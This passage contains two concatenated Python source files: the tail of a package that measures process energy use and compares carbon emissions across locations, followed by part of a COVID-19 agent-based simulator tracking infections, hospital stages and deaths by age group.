default_emissions = [max_global, median_global, min_global, max_europe, \
median_europe, min_europe, max_us, median_us, min_us]
return default_emissions
def emissions_comparison(process_kwh, locations, year, default_location, printToScreen):
# TODO: Disambiguation of states such as Georgia, US and Georgia
intl_data = utils.get_data("data/json/energy-mix-intl_" + year + ".json")
us_data = utils.get_data("data/json/us-emissions_" + year + ".json")
emissions = [] # list of tuples w/ format (location, emission)
for location in locations:
if locate.in_US(location):
emission = convert.lbs_to_kgs(us_data[location]*convert.to_MWh(process_kwh))
emissions.append((location, emission))
else:
c = intl_data[location]
total, breakdown = c['total'], [c['coal'], c['petroleum'], \
c['naturalGas'], c['lowCarbon']]
if isinstance(total, float) and float(total) > 0:
breakdown = list(map(lambda x: 100*x/total, breakdown))
coal, petroleum, natural_gas, low_carbon = breakdown
breakdown = [convert.coal_to_carbon(process_kwh * coal/100),
convert.petroleum_to_carbon(process_kwh * petroleum/100),
convert.natural_gas_to_carbon(process_kwh * natural_gas/100), 0]
emission = sum(breakdown)
emissions.append((location,emission))
if emissions != [] and not default_location and printToScreen:
utils.log('Emissions Comparison', emissions)
return emissions
def get_comparison_data(result, locations, year, printToScreen):
geo = locate.get_location_information()
location = locate.get(printToScreen, geo)
default_location = False
if locations == ["Mongolia", "Iceland", "Switzerland"]:
default_location = True
comparison_values = emissions_comparison(result, locations, year, default_location, printToScreen)
default_emissions = old_emissions_comparison(result, year, default_location, printToScreen)
return (location, default_location, comparison_values, default_emissions)
def png_bar_chart(location, emission, default_emissions):
default_emissions_list = []
for i in range(0, 9):
rounded_default_emission = float(format((default_emissions[i])[1], '.3g'))
default_emissions_list.append(rounded_default_emission)
global_dict = {"Mongolia" : default_emissions_list[0], "South Korea": default_emissions_list[1], "Bhutan" : default_emissions_list[2]}
eu_dict = {"Kosovo" : default_emissions_list[3], "Ukraine" : default_emissions_list[4], "Iceland" : default_emissions_list[5]}
us_dict = {"Wyoming" : default_emissions_list[6], "Mississippi" : default_emissions_list[7], "Vermont" : default_emissions_list[8]}
graph.make_comparison_bar_charts(location, emission, us_dict, eu_dict, global_dict)
def evaluate(user_func, *args, pdf=False, png = False, timeseries=True, powerLoss=0.8, energyOutput=False, \
locations=["Mongolia", "Iceland", "Switzerland"], year="2016", printToScreen = True):
""" Calculates effective emissions of the function
Parameters:
user_func: user's function + associated args
pdf (bool): whether a PDF report should be generated
powerLoss (float): PSU efficiency rating
energyOutput (bool): return value also includes information about energy usage, not just function's return
locations (list of strings): list of locations to be compared
year (str): year of dataset to be used
printToScreen (bool): get information in the command line
"""
try:
utils.setGlobal(printToScreen)
if (utils.valid_cpu() or utils.valid_gpu()):
#print(utils.valid_cpu())
#print(utils.valid_gpu())
result, return_value, watt_averages, files, total_time, time_baseline, reading_baseline_wattage, time_process, reading_process_wattage = energy(user_func, *args, powerLoss = powerLoss, year = year, \
printToScreen = printToScreen, timeseries = timeseries)
"""
location, default_location, comparison_values, default_emissions = get_comparison_data(result, locations, year, printToScreen)
breakdown = energy_mix(location, year = year)
emission, state_emission = emissions(result, breakdown, location, year, printToScreen)
if printToScreen:
utils.log("Assumed Carbon Equivalencies")
"""
if printToScreen:
utils.log("Process Energy", result)
'''
func_info = [user_func.__name__, *args]
kwh_and_emissions = [result, emission, state_emission]
if pdf:
#pass
report.generate(location, watt_averages, breakdown, kwh_and_emissions, \
func_info, comparison_values, default_emissions, default_location)
if png:
# generate energy mix pie chart
energy_dict = {"Coal" : breakdown[0], "Petroleum" : breakdown[1], "Natural Gas" : breakdown[2], "Low Carbon" : breakdown[3]}
figtitle = "Location: " + location
location_split = location.split()
filename = location_split[0]
for i in range(1, len(location_split)):
filename += "_" + location_split[i]
filename += ".png"
if locate.in_US(location):
energy_dict["Oil"] = energy_dict.pop("Petroleum")
figtitle = figtitle + ", USA"
graph.pie_chart(energy_dict, figtitle, filename)
# generate emissions comparison bar charts
png_bar_chart(location, emission, default_emissions)
if timeseries:
graph.timeseries(time_baseline, reading_baseline_wattage, "Baseline Wattage Timeseries")
graph.timeseries(time_process, reading_process_wattage, "Process Wattage Timeseries")
'''
if energyOutput:
return (total_time, result, return_value)
else:
sys.stdout.write("{:<13} {:51} {:>10.2e} \n".format("return_value:", "", return_value))
#return return_value
else:
utils.log("The energy-usage package only works on Linux kernels "
"with Intel processors that support the RAPL interface and/or machines with"
" an Nvidia GPU. Please try again on a different machine.")
except Exception as e:
print("\n" + str(e))
|
Simulator.py
|
from Person import Person as person
from DataPool import DataPool as DataPool
import numpy as np
import math as math
import copy as copy
import random
import threading
from File_handler import File_handler as Writer
class Simulator:
# ---- Constructor ----#
def __init__(self, people, days):
self.writer = Writer("writeData")
self.n = 1000
self.dataPool = DataPool(int(people))
self.dists = 1
self.distAsymp = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distSymp = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]*self.dists
self.distAdmitted = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distCured = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distRecovered = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distICU = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distVen = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distDead = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distIntInfect = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.distNonintInfect = [[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]],[[],[],[],[]]]
self.pr = person()
self.people = []
self.curedKid = []
self.curedYoung = []
self.curedAdult = []
self.recoveredKid = []
self.recoveredYoung = []
self.recoveredAdult = []
self.intInfectKid = []
self.intInfectYoung = []
self.intInfectAdult = []
self.nonintInfectKid = []
self.nonintInfectYoung = []
self.nonintInfectAdult = []
self.asympKid = []
self.asympYoung = []
self.asympAdult = []
self.admittedKid = []
self.admittedYoung = []
self.admittedAdult = []
self.ICUKid = []
self.ICUYoung = []
self.ICUAdult = []
self.VenKid = []
self.VenYoung = []
self.VenAdult = []
self.deadKid = []
self.deadYoung = []
self.deadAdult = []
self.sympYoung = []
self.sympKid = []
self.sympAdult = []
self.dayAdult = 1
self.toICU = 0.11 # increased for now
self.toVen = 0.88
self.records = int(people)
self.toDie = 0.11
self.asympKidNum = []
self.asympYoungNum = []
self.asympAdultNum = []
self.admittedKidNum = []
self.admittedYoungNum = []
self.admittedAdultNum = []
self.ICUKidNum = []
self.ICUYoungNum = []
self.ICUAdultNum = []
self.VenKidNum = []
self.VenYoungNum = []
self.VenAdultNum = []
self.sympYoungNum = []
self.sympKidNum = []
self.sympAdultNum = []
self.deadYoungNum = []
self.deadKidNum = []
self.deadAdultNum = []
self.curedYoungNum = []
self.curedKidNum = []
self.recoveredAdultNum = []
self.recoveredYoungNum = []
self.recoveredKidNum = []
self.intInfectKidNum = []
self.intInfectYoungNum = []
self.intInfectAdultNum = []
self.nonintInfectKidNum = []
self.nonintInfectYoungNum = []
self.nonintInfectAdultNum = []
self.curedAdultNum = []
self.asympNum = []
self.sympNum = []
self.admittedNum = []
self.venNum = []
self.ICUNum = []
self.deadNum = []
self.curedNum = []
self.recoveredNum = []
self.intInfectNum = []
self.nonintInfectNum = []
self.days = int(days)
self.determiner = [[2.774, 0.899], [2.883, 0.856], [2.599, 0.844]]
self.immune_days = 0
self.mask_dist_percent = 0
self.close_circle = 0
# ---- Constructor declared ----#
# ---- Function to count Intervention-Infected patient ----#
def intInfect(self, id):
if self.people[id].age < 5:
self.intInfectKid.append(id)
elif self.people[id].age > 59:
self.intInfectAdult.append(id)
else:
self.intInfectYoung.append(id)
# ---- Completed function definition of intInfect() ----#
# ---- Function to count Non-Intervention-Infected patient ----#
def nonintInfect(self, id):
if self.people[id].age < 5:
self.nonintInfectKid.append(id)
elif self.people[id].age > 59:
self.nonintInfectAdult.append(id)
else:
self.nonintInfectYoung.append(id)
# ---- Completed function definition of nonintInfect() ----#
# ---- Function to Recover the patient ----#
def recovered(self, id):
if self.people[id].age < 5:
self.recoveredKid.append(id)
elif self.people[id].age > 59:
self.recoveredAdult.append(id)
else:
self.recoveredYoung.append(id)
# ---- Completed function definition of recovered() ----#
# ---- Function to Cure the patient ----#
def cured(self, id):
if self.people[id].age < 5:
self.curedKid.append(id)
elif self.people[id].age > 59:
self.curedAdult.append(id)
else:
self.curedYoung.append(id)
# ---- Completed function definition of cured() ----#
# ---- Function to Admit the patient ----#
def admit(self, id):
if self.people[id].age < 5:
self.admittedKid.append(id)
elif self.people[id].age > 59:
self.admittedAdult.append(id)
else:
self.admittedYoung.append(id) # May Erase
# ---- Completed function definition of admit() ----#
# ---- Function get the patient to have Symmptomatic covid-19 ----#
def symp(self, id):
if self.people[id].age < 5:
self.sympKid.append(id)
elif self.people[id].age > 59:
self.sympAdult.append(id)
else:
self.sympYoung.append(id)
# ---- Completed function definition of symp() ----#
# ---- Function get the patient to have Asymptomatic covid-19 ----#
def asymp(self, id):
if self.people[id].age < 5:
self.asympKid.append(id)
elif self.people[id].age > 59:
self.asympAdult.append(id)
else:
self.asympYoung.append(id)
# ---- Completed function definition of asymp() ----#
# ---- Function to get the patient into the ventilator----#
def ven(self, id):
if self.people[id].age < 5:
self.VenKid.append(id)
elif self.people[id].age > 59:
self.VenAdult.append(id)
else:
self.VenYoung.append(id)
# ---- Completed function definition of ven() ----#
# ---- Function to get the patient into the ICU----#
def ICU(self, id):
if self.people[id].age < 5:
self.ICUKid.append(id)
elif self.people[id].age > 59:
self.ICUAdult.append(id)
else:
self.ICUYoung.append(id)
# ---- Completed function definition of ICU() ----#
# ---- This function returns the location of the required element ----#
def exists(self, lis, val):
for i in range(len(lis)):
if lis[i] is val:
return True
return False
# ---- Completed Function definition of constructor ----#
# ---- Function to set the number of contacts for everyone ----#
def setcontacts(self, id):
# if self.people[id].age < 5:
# val = 0
# elif self.people[id].age > 59:
# val = 2
# else:
# val = 1
# print(type(self.people[id]), self.people[id])
numlist = self.dataPool.getNum(self.people[id])/10
# print("Contact: " + str(numlist))
while (True):
self.people[id].contacts = int(numlist) # MODIFIED
if self.people[id].contacts is not None:
break
# ---- This function sets the closest[] to the person whose id is passed ----#
def setclosest(self, id):
lat1 = 15
lat2 = 20
long1 = 77
long2 = 82
farthest = math.hypot(lat2 - lat1, long1 - long2)
size = len(self.people)
for i in range(id, size):
if len(self.people[id].closest) >= self.people[id].contacts:
return
if len(self.people[i].closest) >= self.people[i].contacts:
continue
if id != i:
dist = math.hypot(self.people[id].lat - self.people[i].lat, self.people[id].long - self.people[i].long)
meet = random.choices([1, 0], weights=(1 - (dist / farthest), dist / farthest), k=1)
if meet[0] is 1:
if not self.exists(self.people[id].closest, i):
self.people[id].closest.append(i)
self.people[i].closest.append(id)
# self.writer.log(" The closest of "+str(id)+" is "+str(self.people[id].closest))
# ---- Completed function definition of setClosest() ----#
# ---- This function gets the person to meet up with all the people who have come in contact ----#
def coronaSpree(self, id):
size = len(self.people[id].closest)
weight = []
j = int(0)
if self.people[id].isInfected():
if self.presentday <= 68:
size = size * 0.41
self.close_circle = 0.85
self.mask_dist_percent = 0
elif (self.presentday <= 129) and (self.presentday > 68):
size = size * 0.54
self.close_circle = 0.8
elif (self.presentday <= 142) and (self.presentday > 129):
size = size * 0.67
self.close_circle = 0.75
else:
size = size * 1
self.close_circle = 0.63
for i in range(int(size)): # MODIFIED Might need numerical correction
if i < self.close_circle * (int(size)):
chance = random.randint(3, 10)
j = int(i)
if id > self.people[id].closest[j]:
continue
if not self.people[self.people[id].closest[j]].isHealthy(): # MODIFIED
continue
per = self.people[id].closest[j]
else:
rand = random.randint(0, len(self.people) - 1)
chance = random.randint(1, 5)
if id > rand:
continue
if self.exists(self.people[id].closest, rand):
i = i - 1
continue
if not self.people[rand].isHealthy(): # MODIFIED
continue
else:
per = rand
mask = 0
mask = random.choices([1, 0], weights=(self.mask_dist_percent, 100 - self.mask_dist_percent), k=1)
if mask[0] == 1:
mask_effectiveness = 14.3 # mask effectiveness in percent
chance = chance * ((100 - mask_effectiveness) / 100)
distancing_effectiveness = 10.2 # distancing effectiveness in percent
chance = chance * ((100 - distancing_effectiveness) / 100)
st = random.choices([1, 0], weights=(chance, 100 - chance), k=1) # chance that corona has spread
if st[0] is 1: # If corona has spread through intervention or not
if int(mask[0]) > 0:
self.intInfect(per)
else:
self.nonintInfect(per)
if st[0] is 1: # If corona has spread
if (self.people[per].age < 5):
chance = 0.8
elif (self.people[per].age > 59):
chance = 0.8
else:
chance = 0.8
else: # If corona has not spread
continue
st = random.choices([1, 0], weights=(chance, 1 - chance), k=1) # Odds that the affected is asymptomatic
if st[0] is 1: # if asymptomatic
self.people[per].setStatus("Asymptamatic")
lim = 5 + int(14)
# if self.people[per].age < 5: # incubation period
# lim = lim + int(3)
# elif self.people[per].age > 59:
# lim = lim + int(5)
# else:
# lim = lim + int(14)
self.people[per].setLimit(lim)
self.asymp(per)
else: # if symptomatic
self.people[per].setStatus("Symptamatic")
lim = 5 + int(5)
# if self.people[per].age < 5: # incubation period
# lim = lim + int(3)
# elif self.people[per].age > 59:
# lim = lim + int(5)
# else:
# lim = lim + int(14)
self.people[per].setLimit(lim)
self.symp(per)
return
# ---- Completed function definition of coronaSpree() ----#
# ---- Funtion that updates status once the limit is reached ----#
def update(self):
size = len(self.sympKid)
for i in range(size):
if i >= size:
break
if self.people[self.sympKid[i]].reachedLimit():
self.people[self.sympKid[i]].setLimit(14)
self.people[self.sympKid[i]].setStatus("Admitted")
self.admit(self.sympKid[i])
l = self.sympKid.pop(i)
size = size - 1
size = len(self.sympYoung)
for i in range(size):
if i >= size:
break
if self.people[self.sympYoung[i]].reachedLimit():
self.people[self.sympYoung[i]].setLimit(14)
self.people[self.sympYoung[i]].setStatus("Admitted")
self.admit(self.sympYoung[i])
l = self.sympYoung.pop(i)
size = size - 1
size = len(self.sympAdult)
for i in range(size):
if i >= size:
break
if self.people[self.sympAdult[i]].reachedLimit():
self.people[self.sympAdult[i]].setLimit(14)
self.people[self.sympAdult[i]].setStatus("Admitted")
self.admit(self.sympAdult[i])
l = self.sympAdult.pop(i)
size = size - 1
size = len(self.asympKid)
for i in range(size):
if i >= size:
break
if self.people[self.asympKid[i]].reachedLimit():
self.people[self.asympKid[i]].setLimit(self.immune_days)
self.people[self.asympKid[i]].setStatus("Cured")
self.cured(self.asympKid[i])
self.recovered(self.asympKid[i])
l = self.asympKid.pop(i)
size = size - 1
size = len(self.asympYoung)
for i in range(size):
if i >= size:
break
if self.people[self.asympYoung[i]].reachedLimit():
self.people[self.asympYoung[i]].setLimit(self.immune_days)
self.people[self.asympYoung[i]].setStatus("Cured")
self.cured(self.asympYoung[i])
self.recovered(self.asympYoung[i])
l = self.asympYoung.pop(i)
size = size - 1
size = len(self.asympAdult)
for i in range(size):
if i >= size:
break
if self.people[self.asympAdult[i]].reachedLimit():
self.people[self.asympAdult[i]].setLimit(self.immune_days)
self.people[self.asympAdult[i]].setStatus("Cured")
self.cured(self.asympAdult[i])
self.recovered(self.asympAdult[i])
l = self.asympAdult.pop(i)
size = size - 1
size = len(self.admittedKid)
for i in range(size):
if i >= size:
break
if self.people[self.admittedKid[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toICU, 1 - self.toICU), k=1)
if st[0] == 1:
lim_ = random.triangular(7, 8, 9)
lim = int(lim_)
self.people[self.admittedKid[i]].setStatus("ICU")
self.people[self.admittedKid[i]].setLimit(lim)
self.ICU(self.admittedKid[i])
l = self.admittedKid.pop(i)
size = size - 1
else:
self.people[self.admittedKid[i]].setLimit(self.immune_days)
self.people[self.admittedKid[i]].setStatus("Cured")
self.cured(self.admittedKid[i])
self.recovered(self.admittedKid[i])
l = self.admittedKid.pop(i)
size = size - 1
size = len(self.admittedYoung)
for i in range(size):
if i >= size:
break
if self.people[self.admittedYoung[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toICU, 1 - self.toICU), k=1)
if st[0] == 1:
lim_ = random.triangular(7, 8, 9)
lim = int(lim_)
self.people[self.admittedYoung[i]].setStatus("ICU")
self.people[self.admittedYoung[i]].setLimit(lim)
self.ICU(self.admittedYoung[i])
l = self.admittedYoung.pop(i)
size = size - 1
else:
self.people[self.admittedYoung[i]].setLimit(self.immune_days)
self.people[self.admittedYoung[i]].setStatus("Cured")
self.cured(self.admittedYoung[i])
self.recovered(self.admittedYoung[i])
l = self.admittedYoung.pop(i)
size = size - 1
size = len(self.admittedAdult)
for i in range(size):
if i >= size:
break
if self.people[self.admittedAdult[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toICU, 1 - self.toICU), k=1)
if st[0] == 1:
lim_ = random.triangular(7, 8, 9)
lim = int(lim_)
self.people[self.admittedAdult[i]].setStatus("ICU")
self.people[self.admittedAdult[i]].setLimit(lim)
self.ICU(self.admittedAdult[i])
l = self.admittedAdult.pop(i)
size = size - 1
else:
self.people[self.admittedAdult[i]].setLimit(self.immune_days)
self.people[self.admittedAdult[i]].setStatus("Cured")
self.cured(self.admittedAdult[i])
self.recovered(self.admittedAdult[i])
l = self.admittedAdult.pop(i)
size = size - 1
size = len(self.ICUKid)
for i in range(size):
if i >= size:
break
if self.people[self.ICUKid[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toVen, 1 - self.toVen), k=1)
if st[0] == 1:
lim_ = random.triangular(5, 7, 12)
lim = int(lim_)
self.people[self.ICUKid[i]].setLimit(lim)
self.people[self.ICUKid[i]].setStatus("Ventilator")
self.ven(self.ICUKid[i])
l = self.ICUKid.pop(i)
size = size - 1
else:
self.people[self.ICUKid[i]].setLimit(self.immune_days)
self.people[self.ICUKid[i]].setStatus("Cured")
self.cured(self.ICUKid[i])
self.recovered(self.ICUKid[i])
l = self.ICUKid.pop(i)
size = size - 1
size = len(self.ICUYoung)
for i in range(size):
if i >= size:
break
if self.people[self.ICUYoung[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toVen, 1 - self.toVen), k=1)
if st[0] == 1:
lim_ = random.triangular(5, 7, 12)
lim = int(lim_)
self.people[self.ICUYoung[i]].setLimit(lim)
self.people[self.ICUYoung[i]].setStatus("Ventilator")
self.ven(self.ICUYoung[i])
l = self.ICUYoung.pop(i)
size = size - 1
else:
self.people[self.ICUYoung[i]].setLimit(self.immune_days)
self.people[self.ICUYoung[i]].setStatus("Cured")
self.cured(self.ICUYoung[i])
self.recovered(self.ICUYoung[i])
l = self.ICUYoung.pop(i)
size = size - 1
size = len(self.ICUAdult)
for i in range(size):
if i >= size:
break
if self.people[self.ICUAdult[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toVen, 1 - self.toVen), k=1)
if st[0] == 1:
lim_ = random.triangular(5, 7, 12)
lim = int(lim_)
self.people[self.ICUAdult[i]].setLimit(lim)
self.people[self.ICUAdult[i]].setStatus("Ventilator")
self.ven(self.ICUAdult[i])
l = self.ICUAdult.pop(i)
size = size - 1
else:
self.people[self.ICUAdult[i]].setLimit(self.immune_days)
self.people[self.ICUAdult[i]].setStatus("Cured")
self.cured(self.ICUAdult[i])
self.recovered(self.ICUAdult[i])
l = self.ICUAdult.pop(i)
size = size - 1
size = len(self.VenAdult)
for i in range(size):
if i >= size:
break
if self.people[self.VenAdult[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toDie, 1 - self.toDie), k=1)
if st[0] == 1:
lim_ = random.triangular(5, 7, 12)
lim = int(lim_)
self.people[self.VenAdult[i]].setLimit(lim)
self.people[self.VenAdult[i]].setStatus("Dead")
self.deadAdult.append(self.VenAdult[i])
l = self.VenAdult.pop(i)
size = size - 1
else:
self.people[self.VenAdult[i]].setLimit(self.immune_days)
self.people[self.VenAdult[i]].setStatus("Cured")
self.cured(self.VenAdult[i])
self.recovered(self.VenAdult[i])
l = self.VenAdult.pop(i)
size = size - 1
size = len(self.VenKid)
for i in range(size):
if i >= size:
break
if self.people[self.VenKid[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toDie, 1 - self.toDie), k=1)
if st[0] == 1:
lim = int(-1)
self.people[self.VenKid[i]].setLimit(lim)
self.people[self.VenKid[i]].setStatus("Dead")
self.deadKid.append(self.VenKid[i])
l = self.VenKid.pop(i)
size = size - 1
else:
self.people[self.VenKid[i]].setLimit(self.immune_days)
self.people[self.VenKid[i]].setStatus("Cured")
self.cured(self.VenKid[i])
self.recovered(self.VenKid[i])
l = self.VenKid.pop(i)
size = size - 1
size = len(self.VenYoung)
for i in range(size):
if i >= size:
break
if self.people[self.VenYoung[i]].reachedLimit():
st = random.choices([1, 0], weights=(self.toDie, 1 - self.toDie), k=1)
if st[0] == 1:
lim = int(-1)
self.people[self.VenYoung[i]].setLimit(lim)
self.people[self.VenYoung[i]].setStatus("Dead")
self.deadYoung.append(self.VenYoung[i])
l = self.VenYoung.pop(i)
size = size - 1
else:
self.people[self.VenYoung[i]].setLimit(self.immune_days)
self.people[self.VenYoung[i]].setStatus("Cured")
self.cured(self.VenYoung[i])
self.recovered(self.VenYoung[i])
l = self.VenYoung.pop(i)
size = size - 1
size = len(self.curedKid)
for i in range(size):
if i >= size:
break
if self.people[self.curedKid[i]].reachedLimit():
self.people[self.curedKid[i]].setStatus("Healthy")
l = self.curedKid.pop(i)
size = size - 1
size = len(self.curedYoung)
for i in range(size):
if i >= size:
break
if self.people[self.curedYoung[i]].reachedLimit():
self.people[self.curedYoung[i]].setStatus("Healthy")
l = self.curedYoung.pop(i)
size = size - 1
size = len(self.curedAdult)
for i in range(size):
if i >= size:
break
if self.people[self.curedAdult[i]].reachedLimit():
self.people[self.curedAdult[i]].setStatus("Healthy")
l = self.curedAdult.pop(i)
size = size - 1
# ---- Complted funtion definition of update() ----#
# ---- Set daily records ----#
#[[[kid],[young],[adult],[total]],[[kid],[young],[adult],[total]]]
# district1 district2
#array[dist][0].append(tempKid)
def record(self):
kid = [0]*self.dists
young = [0]*self.dists
adult = [0]*self.dists
if len(self.asympKid) is 0:
self.asympKidNum.append(0)
else:
self.asympKidNum.append(len(self.asympKid))
for i in range(len(self.asympKid)):
# if(self.people[self.asympKid[i]].getDistrict()==1):
# print(" 681 : here ")
kid[self.people[self.asympKid[i]].getDistrict()] = kid[self.people[self.asympKid[i]].getDistrict()] + 1
if len(self.asympYoung) is 0:
self.asympYoungNum.append(0)
else:
self.asympYoungNum.append(len(self.asympYoung))
for i in range(len(self.asympYoung)):
young[self.people[self.asympYoung[i]].getDistrict()] = young[self.people[self.asympYoung[i]].getDistrict()] + 1
if len(self.asympAdult) is 0:
self.asympAdultNum.append(0)
else:
self.asympAdultNum.append(len(self.asympAdult))
for i in range(len(self.asympAdult)):
adult[self.people[self.asympAdult[i]].getDistrict()] = adult[self.people[self.asympAdult[i]].getDistrict()] + 1
#self.distAsymp = [[[], [], [], []]] * self.dists
for i in range(self.dists):
self.distAsymp[i][0].append(kid[i])
self.distAsymp[i][1].append(young[i])
self.distAsymp[i][2].append(adult[i])
self.distAsymp[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
young = [0]*self.dists
adult = [0]*self.dists
total = [0]*self.dists
if (len(self.sympKid) is 0):
self.sympKidNum.append(0)
else:
self.sympKidNum.append(len(self.sympKid))
for i in range(len(self.sympKid)):
kid[self.people[self.sympKid[i]].getDistrict()] = kid[self.people[self.sympKid[i]].getDistrict()] + 1
if len(self.sympYoung) is 0:
self.sympYoungNum.append(0)
else:
self.sympYoungNum.append(len(self.sympYoung))
for i in range(len(self.sympYoung)):
young[self.people[self.sympYoung[i]].getDistrict()] = young[self.people[self.sympYoung[i]].getDistrict()] + 1
if len(self.sympAdult) is 0:
self.sympAdultNum.append(0)
else:
self.sympAdultNum.append(len(self.sympAdult))
for i in range(len(self.sympAdult)):
adult[self.people[self.sympAdult[i]].getDistrict()] = adult[self.people[self.sympAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distSymp[i][0].append(kid[i])
self.distSymp[i][1].append(young[i])
self.distSymp[i][2].append(adult[i])
self.distSymp[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
young = [0]*self.dists
adult = [0]*self.dists
total = [0]*self.dists
if (len(self.admittedKid) is 0):
self.admittedKidNum.append(0)
else:
self.admittedKidNum.append(len(self.admittedKid))
for i in range(len(self.admittedKid)):
kid[self.people[self.admittedKid[i]].getDistrict()] = young[self.people[self.admittedKid[i]].getDistrict()] + 1
if len(self.admittedYoung) is 0:
self.admittedYoungNum.append(0)
else:
self.admittedYoungNum.append(len(self.admittedYoung))
for i in range(len(self.admittedYoung)):
young[self.people[self.admittedYoung[i]].getDistrict()] = young[self.people[self.admittedYoung[i]].getDistrict()] + 1
if len(self.admittedAdult) is 0:
self.admittedAdultNum.append(0)
else:
self.admittedAdultNum.append(len(self.admittedAdult))
for i in range(len(self.admittedAdult)):
adult[self.people[self.admittedAdult[i]].getDistrict()] = adult[self.people[self.admittedAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distAdmitted[i][0].append(kid[i])
self.distAdmitted[i][1].append(young[i])
self.distAdmitted[i][2].append(adult[i])
self.distAdmitted[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
young = [0]*self.dists
adult = [0]*self.dists
total = [0]*self.dists
if len(self.ICUKid) is 0:
self.ICUKidNum.append(0)
else:
self.ICUKidNum.append(len(self.ICUKid))
for i in range(len(self.ICUKid)):
kid[self.people[self.ICUKid[i]].getDistrict()] = kid[self.people[self.ICUKid[i]].getDistrict()] + 1
if len(self.ICUYoung) is 0:
self.ICUYoungNum.append(0)
else:
self.ICUYoungNum.append(len(self.ICUYoung))
for i in range(len(self.ICUYoung)):
young[self.people[self.ICUYoung[i]].getDistrict()] = young[self.people[self.ICUYoung[i]].getDistrict()] + 1
if len(self.ICUAdult) is 0:
self.ICUAdultNum.append(0)
else:
self.ICUAdultNum.append(len(self.ICUAdult))
for i in range(len(self.ICUAdult)):
adult[self.people[self.ICUAdult[i]].getDistrict()] = adult[self.people[self.ICUAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distICU[i][0].append(kid[i])
self.distICU[i][1].append(young[i])
self.distICU[i][2].append(adult[i])
self.distICU[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
young = [0]*self.dists
adult = [0]*self.dists
total = [0]*self.dists
if len(self.VenKid) is 0:
self.VenKidNum.append(0)
else:
self.VenKidNum.append(len(self.VenKid))
for i in range(len(self.VenKid)):
kid[self.people[self.VenKid[i]].getDistrict()] = kid[self.people[self.VenKid[i]].getDistrict()] + 1
if len(self.VenYoung) is 0:
self.VenYoungNum.append(0)
else:
self.VenYoungNum.append(len(self.VenYoung))
for i in range(len(self.VenYoung)):
young[self.people[self.VenYoung[i]].getDistrict()] = young[self.people[self.VenYoung[i]].getDistrict()] + 1
if len(self.VenAdult) is 0:
self.VenAdultNum.append(0)
else:
self.VenAdultNum.append(len(self.VenAdult))
for i in range(len(self.VenAdult)):
adult[self.people[self.VenAdult[i]].getDistrict()] = adult[self.people[self.VenAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distVen[i][0].append(kid[i])
self.distVen[i][1].append(young[i])
self.distVen[i][2].append(adult[i])
self.distVen[i][3].append(kid[i] + young[i] + adult[i])
kid = [0]*self.dists
adult = [0]*self.dists
young = [0]*self.dists
total = [0]*self.dists
if len(self.deadKid) is 0:
self.deadKidNum.append(0)
else:
self.deadKidNum.append(len(self.deadKid))
for i in range(len(self.deadKid)):
kid[self.people[self.deadKid[i]].getDistrict()] = kid[self.people[self.deadKid[i]].getDistrict()] + 1
if len(self.deadYoung) is 0:
self.deadYoungNum.append(0)
else:
self.deadYoungNum.append(len(self.deadYoung))
for i in range(len(self.deadYoung)):
young[self.people[self.deadYoung[i]].getDistrict()] = young[self.people[self.deadYoung[i]].getDistrict()] + 1
if len(self.deadAdult) is 0:
self.deadAdultNum.append(0)
else:
self.deadAdultNum.append(len(self.deadAdult))
for i in range(len(self.deadAdult)):
adult[self.people[self.deadAdult[i]].getDistrict()] = adult[self.people[self.deadAdult[i]].getDistrict()] + 1
for i in range(self.dists):
self.distDead[i][0].append(kid[i])
